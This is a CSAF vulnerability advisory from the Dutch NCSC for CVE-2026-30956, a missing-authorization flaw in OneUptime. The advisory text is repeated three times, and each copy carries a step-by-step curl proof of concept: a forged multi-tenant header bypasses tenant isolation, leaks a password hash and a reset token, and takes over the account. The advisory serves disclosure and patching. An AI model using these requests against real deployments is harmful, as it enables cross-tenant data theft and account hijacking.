{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-30956", "tracking": { "current_release_date": "2026-03-23T04:11:03.667523Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-30956", "initial_release_date": "2026-03-10T01:39:51.739152Z", "revision_history": [ { "date": "2026-03-10T01:39:51.739152Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-10T01:39:57.509216Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-10T06:20:51.703051Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T06:20:58.475180Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-10T17:40:31.737003Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T17:40:34.844067Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-10T18:37:27.293247Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T18:37:31.812231Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-10T19:39:16.603050Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-10T19:58:26.003310Z", "number": "10", "summary": "References created (1)." }, { "date": "2026-03-11T14:54:54.898143Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-11T14:54:57.833701Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-11T23:55:10.634980Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-12T14:26:07.715988Z", "number": "14", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-12T14:26:11.557804Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:29:59.125661Z", "number": "16", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-19T15:30:04.691627Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:33:26.793729Z", "number": "18", "summary": "Source connected.| CVE status created. (valid)| EPSS created." } ], "status": "interim", "version": "18" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<10.0.21", "product": { "name": "vers:unknown/>=0|<10.0.21", "product_id": "CSAFPID-5773374" } } ], "category": "product_name", "name": "@oneuptime/common" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.0.21", "product": { "name": "vers:unknown/<10.0.21", "product_id": "CSAFPID-5775268" } } ], "category": "product_name", "name": "oneuptime" } ], "category": "vendor", "name": "OneUptime" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.0.21", "product": { "name": "vers:unknown/<10.0.21", "product_id": "CSAFPID-5810422", "product_identification_helper": { "cpe": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "oneuptime" } ], "category": "vendor", "name": "hackerbay" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-30956", "cwe": { "id": "CWE-862", "name": "Missing Authorization" }, "notes": [ { "category": "description", "text": "### Summary\nA low‑privileged user can bypass authorization and tenant isolation in OneUptime `v10.0.20` by sending a forged `is-multi-tenant-query` header together with a controlled `projectid` header.\n\nBecause the server trusts this client-supplied header, internal permission checks in `BasePermission` are skipped and tenant scoping is disabled.\n\nThis allows attackers to:\n\n1. Access project data belonging to other tenants\n2. Read sensitive User fields via nested relations\n3. Leak plaintext resetPasswordToken\n4. Reset the victim’s password and fully take over the account\n\nThis results in cross‑tenant data exposure and full account takeover.\n\n### Details\n\nRoot cause\n\nThe API trusts a client‑controlled header to determine whether a request should bypass authorization checks.\n\nCommonAPI.ts\n```\nif (req.headers[\"is-multi-tenant-query\"]) {\n props.isMultiTenantRequest = true;\n}\n```\nBasePermission.ts\n```\nif (!props.isMultiTenantRequest) {\n TablePermission.checkTableLevelPermissions(...)\n QueryPermission.checkQueryPermission(...)\n SelectPermission.checkSelectPermission(...)\n}\n```\nWhen the attacker sends:\n```\nis-multi-tenant-query: true\n```\nthe system skips all authorization checks including:\n\n- Table permission validation\n- Query permission validation\n- Select permission validation\n- Tenant isolation enforcement\n\nAdditionally, tenant scoping is disabled in `TenantPermission`\n\nSensitive user data exposure\n\nProjects marked with:\n```\n@MultiTenentQueryAllowed(true)\n```\nallow cross-tenant queries when the header is present.\n\nThe Project model contains a relation:\n```\ncreatedByUser\n```\nBecause select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:\n```\npassword\nresetPasswordToken\nwebauthnChallenge\n```\n\nReset token stored in plaintext\n\nIn the password reset flow:\n\nAuthentication.ts\n```\nresetPasswordToken: token\n```\nThe reset token is stored in plaintext in the database.\n\nDuring password reset:\n```\n/api/identity/reset-password\n```\nthe server validates the provided token directly.\n\nIf an attacker leaks this token through the authorization bypass, they can immediately reset the victim’s password.\n\nExploitation chain\n\n1. Attacker bypasses tenant isolation using is-multi-tenant-query\n2. Attacker reads victim project\n3. Attacker selects createdByUser.resetPasswordToken\n4. Attacker triggers forgot-password for victim\n5. Attacker retrieves the fresh token via the same query\n6. Attacker calls /api/identity/reset-password\n7. Attacker sets a new password\n8. Attacker logs in as victim\n\nThis results in full account takeover.\n\n### PoC\n\n**Setup:**\n- Local OneUptime v10.0.20 instance\n- Two normal accounts:\n - Attacker account owns Project A (`7cb77c45-c2e0-42b5-8a28-57aa0dec6e82`)\n - Victim account owns Project B (`88ced36b-4c0a-4c12-bdf1-497d60b10b23`) with email `victim@example.com`\n\n---\n\n#### Chain 1: Direct Project Isolation Bypass\n\n**1. Read isolation bypass**\n\n```bash\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {},\n \"select\": {\n \"_id\": true,\n \"name\": true,\n \"createdOwnerEmail\": true\n }\n }'\n```\nResult: Returns both the attacker's and victim's projects:\n```json\n{\n \"data\": [\n {\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"name\": \"Victim Project\",\n \"createdOwnerEmail\": { \"value\": \"victim@example.com\" }\n },\n {\n \"_id\": \"7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\",\n \"name\": \"Attacker Project\",\n \"createdOwnerEmail\": { \"value\": \"attacker@example.com\" }\n }\n ],\n \"count\": 2\n}\n```\n2. Write isolation bypass\n\nVictim project name is initially: Victim Project ORIGINAL\n```\ncurl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\"name\":\"Victim Project EXPLOIT\"}'\n```\nResult: Victim project name is updated to \"Victim Project EXPLOIT\" despite the attacker not being a member of the victim project.\n\n#### Chain 2: Account Takeover via Credential Leakage\n\n3. Trigger password reset for victim\n```\ncurl -X POST http://localhost/api/identity/forgot-password \\\n -H \"content-type: application/json\" \\\n -d \"{\\\"email\\\":\\\"victim@example.com\\\"}\"\n```\n4. Leak victim password hash and reset token via tenant bypass\n```\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {\"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\"},\n \"select\": {\n \"_id\": true,\n \"createdByUser\": {\n \"email\": true,\n \"password\": true,\n \"resetPasswordToken\": true\n }\n }\n }'\n```\nResult: Sensitive user data is exposed:\n```\n{\n \"data\": [{\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"createdByUser\": {\n \"email\": {\"value\": \"victim@example.com\"},\n \"password\": {\"value\": \"faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9\"},\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\"\n }\n }]\n}\n```\n5. Take over victim account using leaked token\n```\n# Reset password with leaked token\ncurl -X POST http://localhost/api/identity/reset-password \\\n -H \"content-type: application/json\" \\\n -d '{\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n\n# Login as victim with new password\ncurl -X POST http://localhost/api/identity/login \\\n -H \"content-type: application/json\" \\\n -d '{\n \"email\": \"victim@example.com\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n```\nResult: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.\n\n\n\nResult: Victim project name is updated despite the attacker not being a member of the victim project.\n### Impact\nThis vulnerability allows a low‑privileged authenticated user to:\n\n- bypass tenant isolation\n- access other tenant projects\n- read sensitive user credential fields\n- leak plaintext reset tokens\n- reset victim passwords\n- fully take over victim accounts\n\nBecause OneUptime is a multi‑tenant monitoring platform, this allows attackers to compromise any tenant account in the system.", "title": "github - https://github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "description", "text": "### Summary\nA low‑privileged user can bypass authorization and tenant isolation in OneUptime `v10.0.20` by sending a forged `is-multi-tenant-query` header together with a controlled `projectid` header.\n\nBecause the server trusts this client-supplied header, internal permission checks in `BasePermission` are skipped and tenant scoping is disabled.\n\nThis allows attackers to:\n\n1. Access project data belonging to other tenants\n2. Read sensitive User fields via nested relations\n3. Leak plaintext resetPasswordToken\n4. Reset the victim’s password and fully take over the account\n\nThis results in cross‑tenant data exposure and full account takeover.\n\n### Details\n\nRoot cause\n\nThe API trusts a client‑controlled header to determine whether a request should bypass authorization checks.\n\nCommonAPI.ts\n```\nif (req.headers[\"is-multi-tenant-query\"]) {\n props.isMultiTenantRequest = true;\n}\n```\nBasePermission.ts\n```\nif (!props.isMultiTenantRequest) {\n TablePermission.checkTableLevelPermissions(...)\n QueryPermission.checkQueryPermission(...)\n SelectPermission.checkSelectPermission(...)\n}\n```\nWhen the attacker sends:\n```\nis-multi-tenant-query: true\n```\nthe system skips all authorization checks including:\n\n- Table permission validation\n- Query permission validation\n- Select permission validation\n- Tenant isolation enforcement\n\nAdditionally, tenant scoping is disabled in `TenantPermission`\n\nSensitive user data exposure\n\nProjects marked with:\n```\n@MultiTenentQueryAllowed(true)\n```\nallow cross-tenant queries when the header is present.\n\nThe Project model contains a relation:\n```\ncreatedByUser\n```\nBecause select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:\n```\npassword\nresetPasswordToken\nwebauthnChallenge\n```\n\nReset token stored in plaintext\n\nIn the password reset flow:\n\nAuthentication.ts\n```\nresetPasswordToken: token\n```\nThe reset token is stored in plaintext in the database.\n\nDuring password reset:\n```\n/api/identity/reset-password\n```\nthe server validates the provided token directly.\n\nIf an attacker leaks this token through the authorization bypass, they can immediately reset the victim’s password.\n\nExploitation chain\n\n1. Attacker bypasses tenant isolation using is-multi-tenant-query\n2. Attacker reads victim project\n3. Attacker selects createdByUser.resetPasswordToken\n4. Attacker triggers forgot-password for victim\n5. Attacker retrieves the fresh token via the same query\n6. Attacker calls /api/identity/reset-password\n7. Attacker sets a new password\n8. Attacker logs in as victim\n\nThis results in full account takeover.\n\n### PoC\n\n**Setup:**\n- Local OneUptime v10.0.20 instance\n- Two normal accounts:\n - Attacker account owns Project A (`7cb77c45-c2e0-42b5-8a28-57aa0dec6e82`)\n - Victim account owns Project B (`88ced36b-4c0a-4c12-bdf1-497d60b10b23`) with email `victim@example.com`\n\n---\n\n#### Chain 1: Direct Project Isolation Bypass\n\n**1. Read isolation bypass**\n\n```bash\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {},\n \"select\": {\n \"_id\": true,\n \"name\": true,\n \"createdOwnerEmail\": true\n }\n }'\n```\nResult: Returns both the attacker's and victim's projects:\n```json\n{\n \"data\": [\n {\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"name\": \"Victim Project\",\n \"createdOwnerEmail\": { \"value\": \"victim@example.com\" }\n },\n {\n \"_id\": \"7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\",\n \"name\": \"Attacker Project\",\n \"createdOwnerEmail\": { \"value\": \"attacker@example.com\" }\n }\n ],\n \"count\": 2\n}\n```\n2. Write isolation bypass\n\nVictim project name is initially: Victim Project ORIGINAL\n```\ncurl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\"name\":\"Victim Project EXPLOIT\"}'\n```\nResult: Victim project name is updated to \"Victim Project EXPLOIT\" despite the attacker not being a member of the victim project.\n\n#### Chain 2: Account Takeover via Credential Leakage\n\n3. Trigger password reset for victim\n```\ncurl -X POST http://localhost/api/identity/forgot-password \\\n -H \"content-type: application/json\" \\\n -d \"{\\\"email\\\":\\\"victim@example.com\\\"}\"\n```\n4. Leak victim password hash and reset token via tenant bypass\n```\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {\"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\"},\n \"select\": {\n \"_id\": true,\n \"createdByUser\": {\n \"email\": true,\n \"password\": true,\n \"resetPasswordToken\": true\n }\n }\n }'\n```\nResult: Sensitive user data is exposed:\n```\n{\n \"data\": [{\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"createdByUser\": {\n \"email\": {\"value\": \"victim@example.com\"},\n \"password\": {\"value\": \"faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9\"},\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\"\n }\n }]\n}\n```\n5. Take over victim account using leaked token\n```\n# Reset password with leaked token\ncurl -X POST http://localhost/api/identity/reset-password \\\n -H \"content-type: application/json\" \\\n -d '{\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n\n# Login as victim with new password\ncurl -X POST http://localhost/api/identity/login \\\n -H \"content-type: application/json\" \\\n -d '{\n \"email\": \"victim@example.com\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n```\nResult: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.\n\n\n\nResult: Victim project name is updated despite the attacker not being a member of the victim project.\n### Impact\nThis vulnerability allows a low‑privileged authenticated user to:\n\n- bypass tenant isolation\n- access other tenant projects\n- read sensitive user credential fields\n- leak plaintext reset tokens\n- reset victim passwords\n- fully take over victim accounts\n\nBecause OneUptime is a multi‑tenant monitoring platform, this allows attackers to compromise any tenant account in the system.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-r5v6-2599-9g3m.json?alt=media" }, { "category": "description", "text": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.21, a low‑privileged user can bypass authorization and tenant isolation in OneUptime v10.0.20 and earlier by sending a forged is-multi-tenant-query header together with a controlled projectid header. Because the server trusts this client-supplied header, internal permission checks in BasePermission are skipped and tenant scoping is disabled. This allows attackers to access project data belonging to other tenants, read sensitive User fields via nested relations, leak plaintext resetPasswordToken, and reset the victim’s password and fully take over the account. This results in cross‑tenant data exposure and full account takeover. This vulnerability is fixed in 10.0.21.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-30956" }, { "category": "description", "text": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.21, a low‑privileged user can bypass authorization and tenant isolation in OneUptime v10.0.20 and earlier by sending a forged is-multi-tenant-query header together with a controlled projectid header. Because the server trusts this client-supplied header, internal permission checks in BasePermission are skipped and tenant scoping is disabled. This allows attackers to access project data belonging to other tenants, read sensitive User fields via nested relations, leak plaintext resetPasswordToken, and reset the victim’s password and fully take over the account. This results in cross‑tenant data exposure and full account takeover. This vulnerability is fixed in 10.0.21.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-30956" }, { "category": "description", "text": "### Summary\nA low‑privileged user can bypass authorization and tenant isolation in OneUptime `v10.0.20` by sending a forged `is-multi-tenant-query` header together with a controlled `projectid` header.\n\nBecause the server trusts this client-supplied header, internal permission checks in `BasePermission` are skipped and tenant scoping is disabled.\n\nThis allows attackers to:\n\n1. Access project data belonging to other tenants\n2. Read sensitive User fields via nested relations\n3. Leak plaintext resetPasswordToken\n4. Reset the victim’s password and fully take over the account\n\nThis results in cross‑tenant data exposure and full account takeover.\n\n### Details\n\nRoot cause\n\nThe API trusts a client‑controlled header to determine whether a request should bypass authorization checks.\n\nCommonAPI.ts\n```\nif (req.headers[\"is-multi-tenant-query\"]) {\n props.isMultiTenantRequest = true;\n}\n```\nBasePermission.ts\n```\nif (!props.isMultiTenantRequest) {\n TablePermission.checkTableLevelPermissions(...)\n QueryPermission.checkQueryPermission(...)\n SelectPermission.checkSelectPermission(...)\n}\n```\nWhen the attacker sends:\n```\nis-multi-tenant-query: true\n```\nthe system skips all authorization checks including:\n\n- Table permission validation\n- Query permission validation\n- Select permission validation\n- Tenant isolation enforcement\n\nAdditionally, tenant scoping is disabled in `TenantPermission`\n\nSensitive user data exposure\n\nProjects marked with:\n```\n@MultiTenentQueryAllowed(true)\n```\nallow cross-tenant queries when the header is present.\n\nThe Project model contains a relation:\n```\ncreatedByUser\n```\nBecause select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:\n```\npassword\nresetPasswordToken\nwebauthnChallenge\n```\n\nReset token stored in plaintext\n\nIn the password reset flow:\n\nAuthentication.ts\n```\nresetPasswordToken: token\n```\nThe reset token is stored in plaintext in the database.\n\nDuring password reset:\n```\n/api/identity/reset-password\n```\nthe server validates the provided token directly.\n\nIf an attacker leaks this token through the authorization bypass, they can immediately reset the victim’s password.\n\nExploitation chain\n\n1. Attacker bypasses tenant isolation using is-multi-tenant-query\n2. Attacker reads victim project\n3. Attacker selects createdByUser.resetPasswordToken\n4. Attacker triggers forgot-password for victim\n5. Attacker retrieves the fresh token via the same query\n6. Attacker calls /api/identity/reset-password\n7. Attacker sets a new password\n8. Attacker logs in as victim\n\nThis results in full account takeover.\n\n### PoC\n\n**Setup:**\n- Local OneUptime v10.0.20 instance\n- Two normal accounts:\n - Attacker account owns Project A (`7cb77c45-c2e0-42b5-8a28-57aa0dec6e82`)\n - Victim account owns Project B (`88ced36b-4c0a-4c12-bdf1-497d60b10b23`) with email `victim@example.com`\n\n---\n\n#### Chain 1: Direct Project Isolation Bypass\n\n**1. Read isolation bypass**\n\n```bash\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {},\n \"select\": {\n \"_id\": true,\n \"name\": true,\n \"createdOwnerEmail\": true\n }\n }'\n```\nResult: Returns both the attacker's and victim's projects:\n```json\n{\n \"data\": [\n {\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"name\": \"Victim Project\",\n \"createdOwnerEmail\": { \"value\": \"victim@example.com\" }\n },\n {\n \"_id\": \"7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\",\n \"name\": \"Attacker Project\",\n \"createdOwnerEmail\": { \"value\": \"attacker@example.com\" }\n }\n ],\n \"count\": 2\n}\n```\n2. Write isolation bypass\n\nVictim project name is initially: Victim Project ORIGINAL\n```\ncurl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\"name\":\"Victim Project EXPLOIT\"}'\n```\nResult: Victim project name is updated to \"Victim Project EXPLOIT\" despite the attacker not being a member of the victim project.\n\n#### Chain 2: Account Takeover via Credential Leakage\n\n3. Trigger password reset for victim\n```\ncurl -X POST http://localhost/api/identity/forgot-password \\\n -H \"content-type: application/json\" \\\n -d \"{\\\"email\\\":\\\"victim@example.com\\\"}\"\n```\n4. Leak victim password hash and reset token via tenant bypass\n```\ncurl -X POST http://localhost/api/project/get-list \\\n -H \"authorization: Bearer \" \\\n -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n -H \"is-multi-tenant-query: true\" \\\n -H \"content-type: application/json\" \\\n -d '{\n \"query\": {\"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\"},\n \"select\": {\n \"_id\": true,\n \"createdByUser\": {\n \"email\": true,\n \"password\": true,\n \"resetPasswordToken\": true\n }\n }\n }'\n```\nResult: Sensitive user data is exposed:\n```\n{\n \"data\": [{\n \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n \"createdByUser\": {\n \"email\": {\"value\": \"victim@example.com\"},\n \"password\": {\"value\": \"faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9\"},\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\"\n }\n }]\n}\n```\n5. Take over victim account using leaked token\n```\n# Reset password with leaked token\ncurl -X POST http://localhost/api/identity/reset-password \\\n -H \"content-type: application/json\" \\\n -d '{\n \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n\n# Login as victim with new password\ncurl -X POST http://localhost/api/identity/login \\\n -H \"content-type: application/json\" \\\n -d '{\n \"email\": \"victim@example.com\",\n \"password\": \"AttackerChosenPassword123!\"\n }'\n```\nResult: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.\n\n\n\nResult: Victim project name is updated despite the attacker not being a member of the victim project.\n### Impact\nThis vulnerability allows a low‑privileged authenticated user to:\n\n- bypass tenant isolation\n- access other tenant projects\n- read sensitive user credential fields\n- leak plaintext reset tokens\n- reset victim passwords\n- fully take over victim accounts\n\nBecause OneUptime is a multi‑tenant monitoring platform, this allows attackers to compromise any tenant account in the system.", "title": "github - https://api.github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "other", "text": "0.00046", "title": "EPSS" }, { "category": "other", "text": "3.7", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5773374", "CSAFPID-5775268", "CSAFPID-5810422" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-r5v6-2599-9g3m.json?alt=media" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-30956" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30956.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30956" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30956" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30956" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.21" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-r5v6-2599-9g3m" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30956" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-5773374", "CSAFPID-5775268", "CSAFPID-5810422" ] } ], "title": "CVE-2026-30956" } ] }